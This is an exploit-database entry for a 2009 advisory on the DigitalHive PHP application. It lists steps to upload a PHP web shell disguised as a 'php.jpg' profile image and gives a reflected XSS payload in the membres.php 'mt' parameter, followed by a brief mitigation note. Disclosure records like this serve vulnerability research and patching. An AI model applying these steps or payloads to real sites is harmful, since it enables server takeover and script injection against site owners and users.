header-logo
Suggest Exploit
vendor:
DigitalHive
by:
ViRuSMaN
8.3
CVSS
HIGH
Remote File Upload Vulnerability
79
CWE
Product Name: DigitalHive
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2009-4010
CPE: a:digitalhive:digitalhive
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

DigitalHive Multiple Vulnerabilities

Signup in the forum by going to http://localhost/[script]/base.php?page=inscription.php, then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click 'modfier', upload your shell in 'php.jpg' format, do a right click in the icon situated in 'Apparence' then copy the link of your shell.

Mitigation:

Sanitize user input
Source

Exploit-DB raw data:

[-]##############################################################
|
| DigitalHive Remote File Upload Vulnerability
|
| Author : ViRuSMaN
|
| Contact : v.-m@live.com
|
| Home : Islam-Attack.CoM , HackTeach.OrG
|
| Download :http://www.digitalhive.com/base.php?page=site/telechargements.php&var=accueil
[-]##############################################################
|
| Exp:
|
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
|
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
|
| 3-Now upload your shell in "php.jpg" format
|
|
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
[-]#############################################################
|
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
[-]#############################################################

==============================================================================
        [»] DigitalHive Multiple Vulnerabilities
==============================================================================

    [»] Script:             [ DigitalHive ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ Hive est systeme permettant de creer facilement et rapidement un systeme ]
    [»] Download:           [ http://www.digitalhive.com/base.php?page=site/telechargements.php&var=dl&num=17 ]
    [»] Founder:            [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Sec-Attack.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

        [»] http://server/[path]/base.php?page=membres.php&mt=[Xss Vuln]

===[ Live Demo ]===

    [»] http://server/base.php?page=membres.php&mt=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Author: ViRuSMaN <-